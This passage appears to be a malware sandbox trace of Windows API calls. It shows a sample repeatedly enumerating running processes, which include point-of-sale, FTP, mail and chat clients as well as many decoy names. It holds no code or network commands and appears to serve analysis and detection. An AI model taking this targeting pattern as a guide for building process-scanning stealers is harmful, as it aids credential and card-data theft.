th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0187.239] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0187.242] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0187.244] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0187.247] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0187.253] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0187.255] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0187.257] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0187.260] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0187.262] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0187.264] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0187.266] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0187.269] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0187.271] CloseHandle (hObject=0x192c) returned 1 [0187.271] Sleep (dwMilliseconds=0x64) [0187.375] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x192c [0187.391] Process32First (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.394] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0187.396] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0187.398] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.402] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0187.404] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.406] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0187.408] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0187.410] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0187.417] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.420] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.422] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0187.425] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.427] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.429] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.431] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.433] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.435] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.437] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.440] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0187.442] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0187.444] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.446] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0187.448] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.450] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0187.456] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0187.459] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0187.461] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0187.464] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0187.466] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0187.468] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.470] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.472] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0187.474] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0187.476] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.478] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0187.480] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0187.483] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0187.485] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0187.487] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0187.489] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0187.496] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0187.514] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0187.517] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0187.519] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0187.521] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0187.602] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0187.605] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0187.607] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0187.609] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0187.611] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0187.614] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0187.616] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0187.618] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0187.620] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0187.622] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0187.624] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0187.632] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0187.634] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0187.637] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0187.639] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0187.641] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0187.643] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0187.645] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0187.647] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0187.649] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0187.651] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0187.653] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0187.655] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0187.657] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0187.659] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0187.660] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 